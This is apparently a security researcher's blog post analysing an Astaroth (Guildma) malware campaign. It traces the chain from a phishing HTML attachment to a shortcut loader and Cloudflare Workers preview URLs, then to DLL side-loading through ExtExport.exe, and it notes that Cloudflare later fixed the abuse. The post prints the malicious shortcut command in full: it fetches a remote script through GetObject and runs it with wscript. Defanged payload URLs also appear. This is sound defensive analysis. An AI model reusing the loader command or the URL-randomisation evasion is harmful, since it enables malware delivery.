Threat Actor behind Astaroth is now using Cloudflare Workers to bypass your Security Solutions.

Threat Actor behind Astaroth is using Cloudflare Workers to bypass your Security Solutions.

✍︎

TL;DR? Skip to the Final Comments. Update: Cloudflare fixed the misuse.

You might have seen the recently published report about a widespread fileless campaign called Astaroth by Microsoft Research Team that completely “lived off the land”: it only ran system tools throughout a complex attack chain. If you haven’t, you SHOULD definitely read the details of the research article done by the Microsoft team here.

Dismantling a fileless campaign: Microsoft Defender ATP’s Antivirus exposes Astaroth attack … The prevailing perception about fileless threats, among the security industry’s biggest areas of concern today, is that…www.microsoft.com

Following the report, the group behind the Astaroth attack campaign changed tactics and they ran a similar campaign again earlier in august with few changes, notably use of Cloudflare Workers. In this article I will try to show highlight the changes and show a clear chain of attack from the delivery till infection, something Microsoft research article failed to do.

Let’s go.

First Stage:

The actors behind the campaign used classic social engineering in this step. They sent a typical message that looks like any of automated emails organizations get about Audit or Billing requests. There is an HTML attachment which is not trying to hide in any sort of way that it’s an HTML file. But this is not a simple HTML file with external links to malware. It’s a carefully crafted and contains obfuscated Javascript code.

✍︎Source code of the HTML page

I will not bore you with the de-obfuscation steps but here is the end result and what rendered by browsers, isn’t it beautiful.

✍︎So simple

Let’s inspect:

First off, it’s simple base64 string to ArrayBuffer function. Next is the base64 encoded URL which is used to retrieve the next step of the attack. The third section is responsible for generating a blob object in the browser’s memory based off of the URL before and auto-downloading it in user’s browsing session. The other sections in the file are just fillers and do not contribute to anything in the process.

hxxp://eaep3xmsaaen[.]promotoradenegocios.com[.]de/5M0BFVGS02W/34284/Duplicata_LeaoBravo_04132583.htm

Let’s look at the URL above more closely, while it might look like another HTML page, it is a domain name sitting behind Cloudflare’s vast web infrastructure. There are two mains reasons behind that.

1. Using Cloudflare, threat actors have added a layer of security where Sandboxes or automated analysis tools would receive the Cloudflare challenge page rather than the actual payload.

2. While it might look like a static page, it is a PHP generated the page and returning different content based on the IP address of the visitors. Cloudflare IP Geolocation adds a header called “CF-IPCountry” to all requests going to the host server. Only to the visitors from Brazilian IP address range would the page show the actual second step payload.

This is JSON payload returned from the URL which we will dig into later.

✍︎JSON returned to Brazilian IP address.

To generate the second stage of the attack, the JSON from the URL is parsed, converted from Base64 to Array buffer, written to browser’s blob storage, renamed to match to the name of the HTML file, a link is created and auto clicked to download it to user’s browser.

✍︎What the download looks like in Chrome.

Second stage:

The second stage starts with a zip file which was just created based on the data from the URL. This method of file creation has few advantages versus just statically downloading a zip file.

1. Threat actor can create different files for different target and serving it via one endpoint.

2. The network traffic might block downloading file objects, but JSON is a natural part of the web and would never be blocked.

3. Some security solution vendors can identify file object on traffic of the network and send that for analysis. This would jeopardize the operation fairly fast and IOCs can be distributed across the world in no time.

The zipped file contains a shortcut with a modified target and Icon.

✍︎Totally legitimate-looking shortcut!

%ComSpec% /c “echo GetObject(“script:hxxps://xsw%RANDOM%nnccccmd95c22[.]cloudflareworkers[.]com/.edgeworker-fiddle-init-preview/6a8db783ccc67c314de2767f33605caec2262527cbed408b4315c2e2d54cf0371proud-glade-92ec.ativadormasterplus.workers.dev/?09/")" > %temp%\Lqncxmm:vbvvjjh.js && start wscript.exe %temp%\Lqncxmm:vbvvjjh.js”

Let’s dissect.

While it’s less commonly known or used but “%ComSpec%” is a pre-assigned environment variable that, by default, stores the “cmd.exe” absolute path and dates back to the stone ages. Next, we have the GetObject VBA function with a link to WScript file to download and run from the temp folder. But pay attention to the URL again, there is %RANDOM% command in the URL. %RANDOM% is a built-in variable in Windows CMD shell that generates a random integer from 0 to 32,767. Since the URL has echo wrapped around it, the random variable is successfully replaced with valid numbers and passed to CMD to execute the GetObject command. This leads to generating an almost unlimited number of URLs based on that random variable returns. To understand how this is working, we need to understand how Cloudflare Workers work.

✍︎By everyone, they mean threat actors as well.

Cloudflare Workers derive their name from Web Workers, and more specifically Service Workers, the W3C standard API for scripts that run in the background in a web browser and intercept HTTP requests. Cloudflare Workers are written against the same standard API but run on Cloudflare’s servers, not in a browser. Cloudflare Workers lets you run JavaScript in Cloudflare’s hundreds of data centers around the world. Using a Worker, one can do a number of things, including:

• Load balance between multiple origins to improve speed or reliability.
• Render HTML templates while fetching dynamic content from your origin.
• Dynamically respond to requests without needing to connect to an origin server at all.
• Generate parallel requests to different services and combine the responses.
• Create custom security rules and filters to block unwanted visitors and bots.
• Perform data sanitation and validation before sending a request to origin.
• Actions happen inside Cloudflare’s lightning-fast edge network.

All and all, Cloudflare Workers’ introduces a great resilient platform to the threat actors without the need for them to maintain infrastructure. Cloudflare.

Workers has a free plan which anyone or anything can sign up and get 100,000 total requests per day. You can create unlimited number of workers per account.

But you might still be asking how did that the URL with a random number as subdomain was created?

Cloudflare Workers dashboard has script editor feature which gives the developers option to write and preview script before deploying to their network. It’s something of a jsfiddle.net if you wish. The preview fiddle renders the script on a different hostname every time the script is run, except it’s not one. It’s a virtual one created based on the incoming request and the Workers name given to it.

Let me show you an example:

Here I have a free worker which is running a simple script to just return “Hello World” as the page content. There is a preview panel on the side that display the changes I make when I press run.

✍︎Workers Script Editor

This is the general flow that Cloudflare Script editor uses to preview the changes:

✍︎

The preview panel is not run from the Workers ID address. if you open up Chrome’s network panel, you would see the response is coming from a different hostname every time.

✍︎First run.

The first run involves making a GET request to

https://84efc29573641d2f04337907900ab249.cloudflareworkers.com/.edgeworker-fiddle-init-preview/ae634c73683563b82196ddb468eede951636ba7051b2f5171ba2ae69ae94b17b1muddy-surf-5e18.marcel.workers.dev/

which after settings a cookie, redirects to

https://84efc29573641d2f04337907900ab249.cloudflareworkers.com

✍︎Second run.

Like the first run, the second run is making a GET request to

https://327559932d6dbe26a9d576034fd615d2.cloudflareworkers.com/.edgeworker-fiddle-init-preview/ae634c73683563b82196ddb468eede951636ba7051b2f5171ba2ae69ae94b17b1muddy-surf-5e18.marcel.workers.dev/

with redirects to

https://327559932d6dbe26a9d576034fd615d2.cloudflareworkers.com

Now if I make an arbitrary change in the Workers name in the first GET request URL, the response would still be the same. Here I replaced the first 5 digits with 12345 and the redirected shows the same content.

✍︎voila!

Potentially this can produce a large or unlimited number of the hostname that can execute particular code which traditional Anti-bot or blocking tools will fail to catch. Cloudflare Workers do not have the capability to host file but it can redirect traffic from its Workers to a static file hosting server without revealing its identity. Cloudflare documentations even provide an example:

✍︎https://developers.cloudflare.com/workers/recipes/static-site/

Remember the shortcut? you can replace the RANDOM with any digits or letters you end up with a preview URL which drops script file.

hxxps://xsw12345nnccccmd95c22[.]cloudflareworkers[.]com/.edgeworker-fiddle-init-preview/6a8db783ccc67c314de2767f33605caec2262527cbed408b4315c2e2d54cf0371proud-glade-92ec.ativadormasterplus.workers.dev

Third Stage:

The script file is saved into temp\ Lqncxmm:vbvvjjh.js and executed with Windows Script Host (Wscript) process. You can see how the threat actor uses the feature of Cloudflare to their advantage. The authors have added a simple random number generator and essentially randomize the URL that will download third stage payload.

✍︎such a simple function

The simple function above will generate a random number based on the parameter given to it. For the third stage, there are ten randomized and unique Cloudflare Worker node links they use a random number between 20000 to 50000, twice for each link. So just one link would have 900 million variations. I’ll let you do the calculation on how many traditional IOCs you would obtain from just a simple script.

✍︎Randomization of download links

Searching for Astaroth samples on URLhaus shows at least one analyst managed to grab the links and submit them to the site. But of course, each time the script is run, the URLs would be different.

✍︎https://urlhaus.abuse.ch/browse/tag/Astaroth/

On Systems running a 32-bit version of windows, the Cloudflare links are not used, instead, a private Google Storage repository with a static link is used.

✍︎but why?

The most likely explanation for this is that they wanted to fool the Sandboxes and automated analysis tools. Most of the automated sandboxes still rely on 32-bit system mainly because it has better anti-sandbox detection techniques. Using this method, the threat actors give away a static IOC to the analyst to keep operation intact in real-world and the users that are being infected.

Here is a sample run from popular Malware analysis platform, Any.run. Just running the script and relying on the IOCs generated by it will hide the fact that Cloudflare is involved in this campaign.

mal.js (MD5: A9A285D4E129FA54F730F6B66F3AD3A7) — Interactive analysis — ANY.RUN Interactive malware hunting service. Any environments ready for live testing most type of threats. Without install…app.any.run

The third stage involves a DLL which has been downloaded from one the links mentioned above and involves a technique called DLL side-loading in which a legit program, intended to load its legit DLLs end uploading a malicious DLL with the same name from the current or a specified path

In this case, the program at “C:\Program Files (x86)\Internet Explorer\ExtExport.exe” is used. ExtExport is a legit binary part of Internet Explorer installation which loads certain DLLs from the specified path given as an argument.

✍︎

The ExtExport is loaded with the argument “C:\Users\Public\Libraries\win32” which contains the dropped files and the concatenation of one of the DLLs downloaded.

✍︎

Renato Marinho of Morphus Labs has just done a great job of analyzing the DLLs of another variant of the Astaroth malware which is almost the same as the one seen earlier in August. According to his analysis of the samples involved, after the DLL side loading, one of the Diebold Warsaw installation binaries, which is a security suite used on systems accessing online banking in Brazil, is hollowed and used to communicate to Facebook and Youtube profiles in order to obtain the Final C2 addresses. Its really cool, You should read it.

Guildma malware is now accessing Facebook and YouTube to keep up-to-date A new variant of the information stealer Guildma (aka Astaroth) we analyzed last week is accessing Facebook and YouTube…morphuslabs.com

Final Comments:

The threat actors currently behind the Astaroth campaign are going through a great length in order to escape detection and fool the conventional Security Solutions. They use Cloudflare Worker and network to:

1. Have a resilient, efficient and secure network to spread payloads.
2. Rely on trusted domain names and services to expand coverage.
3. Hide from sandboxes and interrupt automated analysis tools.
4. An innovative way to generate random payload URLs for each run.
5. Rebuild the operation with ease in case of compromise.

This specific Threat Actor has been known to be using public cloud and storage services to deliver Astaroth payloads, but the latest usage of Cloudflare Workers shows that the team is actively researching new techniques to appear as legitimate traffic and hide their network trace in the infected organizations.

Update:

I have been informed that Cloudflare has implemented a fix for this abuse / misuse of Cloudflare Workers and the methods described in this article no longer work.

✍︎

📝 Read this story later in Journal.

👩‍💻 Wake up every Sunday morning to the week’s most noteworthy stories in Tech waiting in your inbox. Read the Noteworthy in Tech newsletter.